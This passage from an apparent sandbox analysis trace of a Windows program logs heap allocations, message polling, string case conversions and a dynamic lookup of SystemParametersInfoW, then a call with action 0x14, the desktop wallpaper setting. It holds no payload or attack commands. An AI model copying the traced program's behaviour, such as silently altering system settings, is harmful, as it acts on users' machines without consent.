hHeap=0x25c0000) returned 1 [0283.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0283.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0283.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0283.589] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0283.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0283.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0283.589] CharUpperBuffW (in: lpsz="A4200F01243", cchLength=0xb | out: lpsz="A4200F01243") returned 0xb [0283.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0283.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0283.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0283.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2bb8 [0283.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0283.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0283.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0283.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0283.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2058 [0283.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0283.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0283.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0283.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0283.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0283.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0283.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0283.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0283.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0283.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0283.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0283.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa4d8 [0283.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0283.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0283.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0283.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0283.592] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0283.592] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0283.592] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0283.592] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0283.592] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0283.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0283.592] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0283.592] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0283.592] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0283.592] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa5b0 [0283.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa850 [0283.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0283.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0283.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0283.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0283.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0283.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0283.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0283.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0283.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0283.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0283.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0283.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0283.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa850 [0283.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa5b0 [0283.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0283.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0283.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0283.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0283.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0283.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0283.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4870 [0283.595] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0283.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0283.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0283.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0283.595] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0283.595] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0283.595] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0283.595] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0283.595] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0283.595] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0283.595] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0283.595] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0283.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0283.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0283.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0283.596] CharUpperBuffW (in: lpsz="SSA4200F01243", cchLength=0xd | out: lpsz="SSA4200F01243") returned 0xd [0283.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0283.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0283.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0283.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0283.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0283.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0283.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0283.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0283.597] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0283.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0283.597] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0283.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0283.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0283.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0283.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0283.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0283.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0283.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0283.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0283.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0283.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0283.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0283.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0283.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0283.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0283.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0283.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0283.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0283.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0283.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0283.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0283.606] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0283.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0283.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0283.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0283.607] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0283.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0283.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0283.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0283.607] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0283.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0283.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0283.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0283.607] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0283.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0283.608] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0283.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0283.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0283.608] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0283.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab50 [0283.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0283.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0283.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0283.609] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0283.609] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0283.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0283.609] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0283.609] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0283.609] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0283.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0283.609] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0283.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0283.610] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0283.610] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0283.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0283.610] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0283.610] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0283.610] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0283.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0283.610] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0283.610] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0283.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0283.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0283.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0283.611] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0283.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0283.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0283.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0283.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0283.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0283.612] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0283.612] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0283.612] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0283.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0283.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0283.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0283.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0283.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0283.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0283.612] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0283.612] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0283.612] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0283.612] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0283.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0283.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0283.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0283.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0283.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0283.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0283.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0283.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0283.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0283.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0283.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0283.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0283.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0283.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0283.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0283.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0283.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0283.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0283.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0283.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0283.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0283.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0283.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0283.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0283.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0283.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0283.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0283.615] LoadLibraryW (lpLibFileName="user32.dll") returned 0x74f40000 [0283.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0283.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0283.615] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0283.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x16) returned 0x2466e10 [0283.615] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x2466e10, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemParametersInfoW", lpUsedDefaultChar=0x0) returned 22 [0283.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0283.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0283.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0283.616] GetProcAddress (hModule=0x74f40000, lpProcName="SystemParametersInfoW") returned 0x74f590d3 [0283.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0283.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0283.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0283.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0283.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0283.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0283.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0283.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0283.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0283.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0283.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0283.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0283.620] SystemParametersInfoW (in: uiAction=0x14, uiParam=0x0, pvParam=0x0, fWinIni=0x0 | out: pvParam=0x0) returned 1 [0283.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0283.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0283.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0283.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0283.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0283.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0283.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0283.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0283.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0283.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0283.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0283.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0283.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0283.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0283.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0283.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0283.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: 